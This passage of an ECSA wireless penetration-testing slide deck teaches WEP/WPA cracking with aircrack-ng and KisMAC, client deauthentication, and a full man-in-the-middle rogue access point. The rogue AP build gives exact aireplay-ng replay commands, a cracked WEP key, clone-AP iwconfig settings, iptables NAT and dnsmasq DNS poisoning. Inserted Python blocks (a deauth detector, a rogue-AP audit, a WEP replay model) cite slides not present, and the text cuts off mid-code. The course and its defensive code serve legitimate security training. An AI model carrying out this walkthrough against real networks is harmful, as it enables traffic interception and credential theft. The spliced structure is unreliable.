Page 86: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng

AirCrack-ng is available from www.aircrack-ng.org

Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.

Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng.

Aircrack-ng suite performs various statistical attacks to discover the WEP key with small amounts of captured data combined with brute forcing.

For cracking WPA/WPA2 pre-shared keys, a dictionary method is used.

Page 87: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: How Does it Work?

Multiple techniques are combined to crack the WEP key:

• FMS (Fluhrer, Mantin, Shamir) attacks - statistical techniques
• Korek attacks - statistical techniques
• Brute force

When using the statistical techniques to crack a WEP key, each byte of the key is basically handled individually.

Using statistical mathematics, the possibility that a certain byte in the key is guessed right goes up to as much as 15% when you capture the right initialization vector (IV) for a particular key byte.

Certain IVs “leak” the secret WEP key for particular key bytes.

This is the fundamental basis of the statistical techniques.

Page 88: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: FMS and Korek Attacks

By using a series of statistical tests called the FMS and Korek attacks, votes are accumulated for likely keys for each key byte of the secret WEP key.

Different attacks have a different number of votes associated with them since the probability of each attack yielding the right answer varies mathematically.

The more votes a particular potential key value accumulates, the more likely it is to be correct.

For each key byte, the screen shows the likely secret key and the number of votes it has accumulated so far.

The secret key with the largest number of votes is most likely correct but is not guaranteed.

The techniques and the approach above do not work for WPA/WPA2 pre-shared keys.

The only way to crack these pre-shared keys is via a dictionary attack.

Page 89: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: Crack WEP

To crack WEP, start by opening a console window. On the command line, launch AirCrack-ng using the following syntax:

• aircrack-ng -a 1 filename.cap

You can specify multiple input files (either in .cap or .ivs format).

You can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.

Page 90: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: Available Options

Page 91: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: Usage Examples

Page 92: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: Cracking WPA/WPA2 Passphrases

aircrack-ng -w password.lst *.cap

Where:

-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.

*.cap is the name of a group of files containing the IVs.

You can use wildcard * to include multiple files.

Page 93: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: Cracking WPA/WPA2 Passphrases (cont’d)

Page 94: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

AirCrack-ng: Notes

Don’t try to crack the WEP key until you have 200,000 IVs or more.

If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques.

Start by trying 64 bit keys: “aircrack-ng -n 64 captured-data.cap”.

If they are using a 64 bit WEP, it can usually be cracked in less than 5 minutes (generally less than 60 seconds) with relatively few IVs.

If you know the start of the WEP key in hexadecimal, you can enter it with the “-d” parameter.

Let us assume you know the WEP key is “0123456789” in hexadecimal, then you could use “-d 01” or “-d 0123”, etc.

Page 95: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Determining Network Topology: Network View

Once you’ve gained access to the actual wireless network, it helps to know the network topology, including the names of other computers and the devices on the network.

Network View is a small program that is designed to locate network devices and routes using TCP/IP, DNS, SNMP, port scanning, NetBIOS, and Windows Management Interface.

NetworkView will scan a complete 128-node Class C network in just a few minutes.

Page 96: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Network View


Page 97: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WarDriving and Wireless Penetration Testing with OS X

Apple OS X has excellent wireless support and several tools that make WarDriving and Wireless Local Area Network (WLAN) penetration testing easy.

WarDriving with KisMAC:

• KisMAC is a WarDriving and WLAN discovery and penetration testing tool available on any platform, and is available for free at http://kismac.binaervarianz.de/
• Most WarDriving applications provide the capability to discover networks in either active mode or passive mode; KisMAC provides both.
• KisMAC is unique because it also includes the functionality that a penetration tester needs to attack and compromise found networks.

Page 98: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

KisMAC


Page 99: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

KisMAC (cont’d)


Page 100: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

KisMAC (cont’d)


Page 101: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

KisMAC (cont’d)


Page 102: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

KisMAC (cont’d)


Page 103: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Using a GPS

Most GPS devices capable of National Marine Electronics Association (NMEA) output work with KisMAC.

Many of these devices are only available with serial cables.

In most cases, you will need to purchase a serial-to-USB adapter in order to connect your GPS to your Mac.

Most of these adapters come with drivers for OS X; thus, make sure that the one you purchase includes these drivers.

You may be able to use a USB GPS cable and eliminate the need for a USB-to-serial adapter.

The GPS Store sells these cables at: http://www.thegpsstore.com/detail.asp?product_id=GL0997

Page 104: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Attacking WEP with KisMAC

Since you have determined that WEP is being used on your target wireless network, you now have to decide how you want to crack the key. KisMAC has three primary methods of WEP cracking built in:

• Wordlist attacks.
• Weak scheduling attacks.
• Bruteforce attacks.

To use one of these attacks, you have to generate enough initialization vectors (IVs) for the attack to work.

The easiest way to do this is by reinjecting traffic, which is usually accomplished by capturing an Address Resolution Protocol (ARP) packet, spoofing the sender, and sending it back to the access point.

This generates a large amount of traffic that can then be captured and decoded.

Page 105: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Deauthenticating Clients

Deauthenticating clients with KisMAC is simple.

Before you can begin deauthenticating, you must lock KisMAC to the specific channel that your target network is using.

If KisMAC is successful in its attempt to deauthenticate, the dialog changes to note the BSSID of the access point it is deauthenticating.

During the time the deauthentication is occurring, clients cannot use the wireless network.
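The frames these slides talk about (beacons and probe responses that carry the SSID, and the deauthentication frames that the Monkey-Jack sequence and the KisMAC deauthentication step depend on) are also what a defender can watch for. The following is an added example, not code from the EC-Council deck or from any tool it names: a small Python parser for 802.11 management frames that pulls the SSID out of beacons and probe responses (an empty SSID element is what you see when beacon SSID broadcast has been disabled, as on the "Disabling the Beacon" slide) and a sliding-window detector that alerts when a single BSSID emits a burst of deauthentication or disassociation frames, which is exactly the "clients cannot use the wireless network" condition described above. The frames are constructed inside the block rather than captured; the BSSID 00:13:10:1E:65:42 is the deck's example value, while the hidden-SSID BSSID, the threshold of 10 frames in 5 seconds and the function names are this example's own assumptions.

```python
import struct
from collections import defaultdict, deque

# Management-frame subtypes from the IEEE 802.11 frame control field
SUBTYPE_NAMES = {4: "probe-req", 5: "probe-resp", 8: "beacon",
                 10: "disassoc", 12: "deauth"}
BROADCAST = "ff:ff:ff:ff:ff:ff"


def parse_mgmt(frame):
    """Decode the 24-byte header of an 802.11 management frame plus the
    SSID element (beacon/probe) or reason code (deauth/disassoc).
    Returns None for anything that is not a management frame."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:          # type 0 = management
        return None
    subtype = (fc >> 4) & 0xF
    info = {"subtype": SUBTYPE_NAMES.get(subtype, str(subtype)),
            "dst": frame[4:10].hex(":"), "src": frame[10:16].hex(":"),
            "bssid": frame[16:22].hex(":"), "ssid": None, "reason": None}
    body = frame[24:]
    if subtype in (5, 8):             # probe response / beacon: 12 fixed bytes first
        ies = body[12:]
    elif subtype == 4:                # probe request: elements start immediately
        ies = body
    else:
        ies = b""
        if subtype in (10, 12) and len(body) >= 2:
            info["reason"] = struct.unpack_from("<H", body, 0)[0]
    pos = 0
    while pos + 2 <= len(ies):        # walk tag/length/value elements
        tag, ln = ies[pos], ies[pos + 1]
        if tag == 0:                  # element 0 = SSID; empty means hidden
            info["ssid"] = ies[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
            break
        pos += 2 + ln
    return info


def detect_deauth_flood(events, threshold=10, window=5.0):
    """events: iterable of (timestamp_seconds, frame_bytes) in time order.
    Alerts once per BSSID when deauth/disassoc frames from it reach
    `threshold` inside a sliding `window` of seconds (assumed values)."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, frame in events:
        info = parse_mgmt(frame)
        if not info or info["subtype"] not in ("deauth", "disassoc"):
            continue
        q = recent[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and info["bssid"] not in alerted:
            alerted.add(info["bssid"])
            alerts.append({"bssid": info["bssid"], "ts": ts, "count": len(q)})
    return alerts


# --- constructed test frames (built here, not captured from any network) ---
def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mgmt_frame(subtype, dst, src, bssid, body=b""):
    fc = struct.pack("<H", subtype << 4)            # version 0, type 0 (management)
    return fc + b"\x00\x00" + _mac(dst) + _mac(src) + _mac(bssid) + b"\x00\x00" + body


def beacon(ssid, bssid):
    fixed = struct.pack("<QHH", 0, 100, 0x0011)     # timestamp, interval, capability
    return mgmt_frame(8, BROADCAST, bssid, bssid, fixed + bytes([0, len(ssid)]) + ssid.encode())


def deauth(dst, bssid, reason=7):
    return mgmt_frame(12, dst, bssid, bssid, struct.pack("<H", reason))


AP = "00:13:10:1e:65:42"        # the deck's example BSSID
HIDDEN_AP = "00:aa:bb:cc:dd:ee"  # constructed: an AP with SSID broadcast disabled
SAMPLE_EVENTS = ([(0.0, beacon("VisitorLAN", AP)), (0.1, beacon("", HIDDEN_AP))]
                 + [(1.0 + i * 0.05, deauth(BROADCAST, AP)) for i in range(12)])


if __name__ == "__main__":
    for ts, frame in SAMPLE_EVENTS[:2]:
        print(ts, parse_mgmt(frame))
    print(detect_deauth_flood(SAMPLE_EVENTS))
```

The detector keys on the BSSID in address 3, so a burst of broadcast deauthentications "from" the real AP triggers it whether they were sent by the AP or forged in its name; a wireless IDS would add the observed signal strength and sequence numbers to tell the two apart.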

Page 106: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Attacking WPA with KisMAC

Unlike WEP, which requires a large amount of traffic be generated in order to crack the key, cracking WPA only requires that you capture the four-way Extensible Authentication Protocol Over Local Area Network (EAPOL) handshake at authentication.

Unlike cracking WEP, the WPA attack is an offline dictionary attack, which means that when you use KisMAC to crack a WPA pre-shared key (or passphrase), you only need to capture a small amount of traffic; the actual attack can be carried out later, even when you are out of range of the access point.

To attempt a dictionary attack using KisMAC, you may need to deauthenticate clients.

When attempting dictionary attacks against WPA, everything can be done from one host, which will cause the client to disassociate from the network and force them to reconnect.

This requires the four-way EAPOL handshake to be transmitted again.

Page 107: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Attacking WPA with KisMAC (cont’d)

Page 108: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Brute-Force Attacks Against 40-bit WEP

KisMAC includes functionality to perform Bruteforce attacks against 40-bit WEP keys.

There are four ways KisMAC can accomplish this:

• All possible characters
• Alphanumeric characters only
• Lowercase letters only
• Newsham’s 21-bit attack

Each of these attacks is very effective, but also very time and processor intensive.

Page 109: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wordlist Attacks

KisMAC provides the functionality to perform many types of wordlist attacks in addition to WPA attacks.

Cisco developed the Lightweight Extensible Authentication Protocol (LEAP) to help organizations concerned about vulnerabilities in WEP.

LEAP is also vulnerable to wordlist attacks similar to WPA.

KisMAC can perform wordlist attacks against LEAP.

Wordlist attacks can be launched against 40- and 104-bit Apple keys or 104-bit Message Digest 5 (MD5) keys in the same manner.

Page 110: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Mapping WarDrives with StumbVerter

StumbVerter takes input data from NetStumbler and plots the access points found on Microsoft MapPoint maps.

The logged WAPs will be shown with small icons, their color and shape relating to WEP mode and signal strength.

Page 111: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

StumbVerter


Page 112: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

MITM Attack


Page 113: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

MITM Attack Design

A basic MITM attack connects a wireless client (the victim) to the attacker’s access point, and then forwards the traffic to the real (authorized) AP.

Components required:

The target—AP(s):

• To successfully perform a MITM attack, an attacker needs one or more target APs.

The victim—wireless client(s):

• Wireless clients or the victim(s) of the MITM attack have an initial wireless connection to the target AP.
• During the MITM attack, we will disconnect the victim from the target AP and have them associate to the MITM AP.

The MITM attack platform:

• The MITM attack platform provides access point functionality for wireless client(s) that were originally connected to a target AP.
• The MITM attack platform is configured with almost identical settings as the target AP, so that a client cannot tell the difference between the attacker’s access point and the real (authorized) access point.
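The "Report Recommendations" slide earlier in this module asks for a complete inventory of wireless devices, and that inventory is what lets a defender notice the platform described above: it advertises the same SSID, but from a BSSID the organization does not own. Added example, not the deck's code or that of any tool it names: a Python audit that compares scan results (the fields NetStumbler and Kismet log: SSID, BSSID, channel, encryption) against an authorized-AP inventory and flags unknown BSSIDs reusing an inventoried SSID, encryption or channel mismatches on known APs, weak or absent encryption, and factory-default-looking SSIDs (the "verify that the AP SSIDs have been changed" check). The inventory, the scan rows and the default-SSID hint list are constructed here; VisitorLAN and 00:13:10:1E:65:42 are the deck's example values, every other name and address is made up for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ApRecord:
    ssid: str
    bssid: str        # colon-separated, any case
    channel: int
    encryption: str   # "OPEN", "WEP", "WPA" or "WPA2"


# Constructed authorized inventory. VisitorLAN / 00:13:10:1E:65:42 are the
# deck's example values; CorpNet and its BSSID are made up for this example.
INVENTORY = {
    "00:13:10:1e:65:42": ApRecord("VisitorLAN", "00:13:10:1e:65:42", 6, "WEP"),
    "00:0f:66:11:22:33": ApRecord("CorpNet", "00:0f:66:11:22:33", 11, "WPA2"),
}

# Constructed scan output in the shape NetStumbler/Kismet-style tools report.
SAMPLE_SCAN = [
    ApRecord("VisitorLAN", "00:13:10:1E:65:42", 6, "WEP"),   # the real AP
    ApRecord("VisitorLAN", "00:DE:AD:BE:EF:01", 6, "OPEN"),  # same SSID, unknown BSSID
    ApRecord("CorpNet", "00:0f:66:11:22:33", 11, "WPA"),     # known AP, weaker crypto
    ApRecord("linksys", "00:14:BF:AA:BB:CC", 1, "OPEN"),     # unmanaged AP, default name
]

# Factory-default SSID fragments (a constructed, deliberately short list).
DEFAULT_SSID_HINTS = ("linksys", "netgear", "dlink", "default", "wireless")
WEAK = ("OPEN", "WEP")


def is_default_ssid(ssid):
    s = ssid.lower()
    return any(h in s for h in DEFAULT_SSID_HINTS)


def audit_scan(scan, inventory):
    """Return (severity, bssid, message) findings for a scan vs. the inventory."""
    inventory = {k.lower(): v for k, v in inventory.items()}
    known_ssids = {ap.ssid for ap in inventory.values()}
    findings, seen = [], set()
    for ap in scan:
        key = ap.bssid.lower()
        seen.add(key)
        auth = inventory.get(key)
        if auth is None:
            if ap.ssid in known_ssids:
                findings.append(("HIGH", ap.bssid,
                                 f"unknown BSSID advertising inventoried SSID {ap.ssid!r}; possible MITM/evil-twin AP"))
            else:
                findings.append(("INFO", ap.bssid, f"AP {ap.ssid!r} not in inventory"))
        else:
            if ap.encryption != auth.encryption:
                findings.append(("HIGH", ap.bssid,
                                 f"encryption {ap.encryption} differs from inventoried {auth.encryption}"))
            if ap.channel != auth.channel:
                findings.append(("MEDIUM", ap.bssid,
                                 f"channel {ap.channel} differs from inventoried {auth.channel}"))
        if ap.encryption in WEAK:
            findings.append(("MEDIUM", ap.bssid, f"weak or no encryption ({ap.encryption})"))
        if is_default_ssid(ap.ssid):
            findings.append(("LOW", ap.bssid, f"SSID {ap.ssid!r} looks like a factory default"))
    # An inventoried AP that is missing from the scan may be switched off, or replaced.
    for key, auth in inventory.items():
        if key not in seen:
            findings.append(("LOW", auth.bssid, f"inventoried AP {auth.ssid!r} not observed"))
    return findings


if __name__ == "__main__":
    for sev, bssid, msg in audit_scan(SAMPLE_SCAN, INVENTORY):
        print(f"[{sev}] {bssid}: {msg}")
```

Matching on BSSID rather than SSID is the point: the MITM platform copies the SSID, channel and security settings, but it cannot be in the inventory, so an SSID seen from two BSSIDs where only one is authorized is the signal to chase.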

Page 114: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

MITM Attack Design (cont’d)


Page 115: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

MITM Attack Variables

To successfully perform a MITM attack against a wireless network, a few variables come into play.

The first variable is how the target AP is configured; specifically, what security features are enabled on the access point to prevent unauthorized access.

Before an attack can begin, the following tasks must be accomplished:

• Locate one or more AP(s) with wireless clients already attached.
• Identify the security controls and encryption scheme enabled on the target access point.
• Circumvent the security controls and associate to the target access point.

To establish connectivity and forward client traffic back to the target wireless network, you must be able to circumvent the security controls of the target AP.

If you can’t do this, you can’t forward the client’s traffic back to the target access point.

Page 116: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Hardware for the Attack: Antennas, Amps, and WiFi Cards

To successfully perform a MITM attack, you need several pieces of hardware and a few key software programs.

A typical MITM attack platform utilizes the following hardware components:

• A laptop computer with two Personal Computer Memory Card International Association (PCMCIA) slots.
• Two wireless Network Interface Cards (NICs).
• An external antenna (omni-directional preferred).
• A bi-directional amplifier (optional).
• Pigtails to connect the external antennae to the amplifier and wireless NIC.
• A handheld global positioning system (GPS) unit (optional).
• A power inverter.

Page 117: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Hardware for the Attack: Antennas, Amps, and WiFi Cards

Page 118: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Laptop

A laptop computer with two PC card (PCMCIA) slots, or one PCMCIA card slot and one mini-PCI slot, is required for the two wireless network cards.

The laptop serves as a clone of the target AP and provides connectivity back to the target wireless network.

The platform also runs a web server to host any spoofed websites discovered during an attack.

Therefore, the laptop should be well equipped to handle memory-intensive tasks.

Page 119: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Network Cards

Two wireless network cards are required for an attack platform.

One wireless card provides access point functionality for wireless client(s) (victims), and must be able to go into Host AP mode (also known as master mode).

The second wireless card provides connectivity to the target AP, and can be any 802.11 Border Gateway (B/G) card supported by Linux.

Page 120: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Card Interfaces for the Attack Platform

Page 121: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Choosing the Right Antenna

Wireless connectivity to the target AP and the wireless client(s) is essential in order for this attack to work.

You need to have a strong wireless signal broadcasting from the Host AP access point.

Therefore, choosing the right antenna is important.

There are two main types of antennas to consider for this attack: directional and omni-directional antennas.

Page 122: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Amplifying the Wireless Signal

A 2.4 gigahertz (GHz) amplifier is designed to extend the range of a 2.4 GHz radio device or an AP.

The amplifier is used in conjunction with an antenna to boost the signal of your MITM access point.

The intent is for the wireless signal of the MITM access point to be stronger than the wireless signal of the target access point.

A typical amplifier has two connectors; depending on the connector type, one connection is made to the SENAO wireless card using a Multimedia Communications Exchange (MMCX) to N-Male pigtail, and the other connects to the omni-directional antenna.

Page 123: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Signal Strength


Page 124: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Identify and Compromise the Target Access Point

Before you can mount the MITM attack, you need to identify and compromise the target AP.

To gather preliminary data on the target, you need to go back to WarDriving basics and gain as much information about the target as you can.

Example:

Target network Service Set Identifier (SSID):

• VisitorLAN

Target network Basic Service Set Identifier (BSSID):

• 00:13:10:1E:65:42

Wireless client connected:

• 00:02:2D:2D:82:36

The target network encryption:

• WEP

The target network IP range:

• 192.168.1.0/24

Page 125: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Compromising the Target

You have identified a target access point; however, to perform your MITM attack you need to connect to the access point, and to do this you need to compromise the WEP key.

To crack the WEP key, you need to know the BSSID of the access point and the Media Access Control (MAC) address of a wireless client already connected.

Using the Aircrack-ng tools, you can begin the attack against the VisitorLAN access point.

Page 126: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Crack the WEP key

To start airodump-ng on the wlan0 interface, locked to channel 6 and writing the captured IVs to the output file visitorlan-01.cap, use the following command:

• airodump-ng -w visitorlan -c 6 wlan0

Once airodump-ng is running, open a new terminal and start aireplay-ng in ARP-request replay mode with the following command:

• aireplay-ng --arpreplay -b 00:13:10:1E:65:42 -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -h 00:02:2D:2D:82:36 wlan0

aireplay-ng waits for an encrypted ARP request from the client 00:02:2D:2D:82:36 (-m/-n restrict the capture to ARP-sized frames and -d to the broadcast destination) and re-injects it to the access point, which answers every replay with a new IV; those IVs are what aircrack-ng needs to recover the key.
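The following Python model, added here as an illustration and not part of the ECSA material or of aircrack-ng, shows the two WEP properties the commands above rely on: a captured ARP request can be replayed unchanged because the CRC-32 ICV only detects transmission errors, not replays, so the AP accepts it and answers under a fresh IV; and because the 24-bit IV is the only per-frame variation of the RC4 key, any two frames sharing an IV share keystream, which the fixed LLC/SNAP/ARP header (known plaintext) exposes. The key is the one the module recovers; the IV, the ARP body and the second frame are constructed for the demonstration. The statistical key recovery itself (FMS/KoreK) is left to aircrack-ng.

```python
"""Toy model of WEP framing (RC4 + CRC-32 ICV) showing why ARP replay and
IV reuse work.  Added example; not from the ECSA module or aircrack-ng."""
import struct
import zlib

# 104-bit key from the module (hex of "matthew022306").  IVs and frame
# contents below are constructed for the demonstration.
WEP_KEY = bytes.fromhex("6D617474686577303232333036")
# LLC/SNAP header + EtherType 0x0806: every ARP frame starts with these 8
# bytes, so an attacker always has 8 bytes of known plaintext.
ARP_SNAP = bytes.fromhex("AAAA030000000806")


def rc4(key: bytes, n: int) -> bytes:
    """Return the first n bytes of RC4 keystream for key (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV(3) || key-id(1) || RC4_{IV||key}(plaintext || CRC32)."""
    assert len(iv) == 3
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(plaintext + icv, ks))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (icv_ok, plaintext).  The ICV is a CRC, not a MAC: it catches
    noise but cannot tell a replayed or forged frame from a fresh one."""
    iv, body = frame[:3], frame[4:]
    ks = rc4(iv + key, len(body))
    pt = bytes(a ^ b for a, b in zip(body, ks))
    data, icv = pt[:-4], pt[-4:]
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) == icv, data


def ap_accepts_replay(key: bytes, captured: bytes) -> bool:
    """An AP receiving an old frame again checks only the ICV: WEP has no
    replay counter, so the frame is accepted and re-sent under a fresh IV.
    This is exactly what aireplay-ng --arpreplay exploits to harvest IVs."""
    ok, _ = wep_decrypt(key, captured)
    return ok


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """Ciphertext XOR known plaintext = keystream for this IV (no key needed)."""
    body = frame[4:4 + len(known)]
    return bytes(a ^ b for a, b in zip(body, known))


def decrypt_with_keystream(frame: bytes, ks: bytes) -> bytes:
    """Decrypt the first len(ks) bytes of any frame that reused the same IV."""
    return bytes(a ^ b for a, b in zip(frame[4:4 + len(ks)], ks))


def demo():
    iv = b"\x01\x02\x03"                       # a 24-bit IV; only 2^24 exist
    arp = ARP_SNAP + bytes(28)                 # constructed ARP request body
    captured = wep_encrypt(WEP_KEY, iv, arp)   # what airodump-ng records
    replay_ok = ap_accepts_replay(WEP_KEY, captured)
    ks = keystream_from_known_plaintext(captured, ARP_SNAP)
    # A different frame sent later under the same IV leaks its first bytes.
    other = wep_encrypt(WEP_KEY, iv, b"GET /login HTTP/1.1\r\n")
    leaked = decrypt_with_keystream(other, ks)
    return replay_ok, leaked


if __name__ == "__main__":
    ok, leaked = demo()
    print("replayed ARP accepted by AP:", ok)
    print("bytes recovered through IV reuse:", leaked)
```

demo() returns True for the replay and the first eight plaintext bytes of the second frame; with only 16 million IVs and a busy replay loop, IV collisions are a matter of minutes, which is why the module's ARP replay is enough to feed aircrack-ng.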

Page 127: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Aircrack-ng Cracked the WEP Key

Run aircrack-ng against the capture file (visitorlan-01.cap) while IVs are still being collected; once it has recovered the key, you have all of the information required to connect to the target access point and begin your MITM attack.

Page 128: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

The MITM Attack Laptop Configuration

Connecting to the target network:

• The wireless interface wlan0 is the internal mini-PCI card, which provides the connection to the target wireless network.

Using a series of commands, you can set up the wireless connection to connect to the target access point:

ifconfig wlan0 down

iwconfig wlan0 mode Managed ap 00:13:10:1E:65:42

iwconfig wlan0 key 6D617474686577303232333036

ifconfig wlan0 up


dhcpcd wlan0

Page 129: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

The MITM Attack Laptop Configuration (cont’d)

wlan1 - Setting up the AP:

The second wireless card (i.e., wlan1) is the PCMCIA SENAO card, which acts as the Host AP access point. Configure the wlan1 interface to be an access point using the following commands:

ifconfig wlan1 down

iwconfig wlan1 mode Master essid VisitorLAN

iwconfig wlan1 key 6D617474686577303232333036

ifconfig wlan1 192.168.10.1 netmask 255.255.255.0

ifconfig wlan1 up

At this point, the MITM access point is configured on the wlan1 interface using the same SSID and WEP key as the target AP, so a client that roams to it sees no difference.

Page 130: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

IP Forwarding and NAT using IPtables

You will need to enable IP forwarding and NAT, ultimately turning the laptop into a wireless router/gateway.

IP forwarding lets the kernel pass traffic between the two wireless interfaces.

NAT translates the IP addresses used on the internal network (wlan1, 192.168.10.x) to the laptop's own address on the target network (wlan0, 192.168.1.x).

On the MITM attack laptop, the network associated with the wlan1 interface is the internal (victim) network, and the network associated with the wlan0 interface is the outside network.

When a client on the internal network (wlan1) connects to an IP located on the outside network (wlan0), the source address is rewritten to the laptop's wlan0 address as the packet passes through the attack system, and the reply is translated back on the way in.

Page 131: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Installing IPtables and IP Forwarding

IPtables is the command-line program used to configure the packet filtering rule sets and NAT.

Start the IPtables service using the following command:

• /etc/init.d/iptables start

Next, enable IP forwarding by editing the /etc/sysctl.conf file and changing the net.ipv4.ip_forward variable from 0 to 1 (the file is applied at boot, so reload it or reboot for the change to take effect).

Page 132: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

/etc/sysctl.conf file


Page 133: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Establishing the NAT Rules

You know the IP range of the target network is 192.168.1.0/24, and you placed your own access point on the 192.168.10.0/24 network. The following commands define the NAT rules:

Flush the current rules:

iptables -F

iptables -t nat -F

Add the forwarding and masquerading rules:

iptables -A FORWARD -i wlan0 -s 192.168.1.0/255.255.255.0 -j ACCEPT

iptables -A FORWARD -i wlan1 -s 192.168.10.0/255.255.255.0 -j ACCEPT

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

The two FORWARD rules only matter if the chain's default policy is DROP; the MASQUERADE rule is what rewrites the source address of traffic leaving wlan0 to the laptop's address on the target network.

After the rules have been defined, save them with the following command:

/etc/init.d/iptables save

Page 134: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Establishing IPtable NAT Rules (cont’d)

Page 135: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Dnsmasq

Dnsmasq is a lightweight, easily configured Domain Name System (DNS) forwarder and Dynamic Host Configuration Protocol (DHCP) server.

It serves two important functions on your attack platform: it provides IP addresses to the wireless clients connecting to your access point, and it gives you the ability to monitor and poison DNS queries.

This tool is very useful for redirecting the DNS requests for web applications to your spoofed web server.

Page 136: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Configuring Dnsmasq

Configuring Dnsmasq is reasonably simple.

The program has many options, but you only need to edit a few lines to get it up and running.

Edit the Dnsmasq configuration file located at /etc/dnsmasq.conf; this is where the DHCP address allocations for your clients and the address entries used later for DNS poisoning are defined.

After you configure Dnsmasq, start it with the following command:

•/etc/init.d/dnsmasq start

DHCP and DNS requests are logged in /var/log/messages

To monitor incoming DHCP requests, you can check the /var/log/messages file with the following command:

• grep dnsmasq /var/log/messages | grep -i dhcp
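As an added example (not from the module), the following Python script does the job of the grep pipeline in a structured way: it pulls DHCP leases and DNS query/answer pairs out of syslog-format dnsmasq lines and flags the queries that dnsmasq answered from its own address= configuration rather than from the upstream resolver. The log lines are constructed in dnsmasq's log-dhcp and log-queries format; the host name mitm, the PIDs and the addresses are invented.

```python
"""Parse dnsmasq DHCP and DNS entries out of a syslog file such as
/var/log/messages.  Added example (not from the ECSA module); the log lines
below are constructed in dnsmasq's log-dhcp / log-queries format."""
import re

SAMPLE_LOG = """\
Mar  3 10:15:01 mitm dnsmasq-dhcp[2210]: DHCPDISCOVER(wlan1) 00:02:2d:2d:82:36
Mar  3 10:15:01 mitm dnsmasq-dhcp[2210]: DHCPOFFER(wlan1) 192.168.10.50 00:02:2d:2d:82:36
Mar  3 10:15:01 mitm dnsmasq-dhcp[2210]: DHCPREQUEST(wlan1) 192.168.10.50 00:02:2d:2d:82:36
Mar  3 10:15:01 mitm dnsmasq-dhcp[2210]: DHCPACK(wlan1) 192.168.10.50 00:02:2d:2d:82:36 visitor-pc
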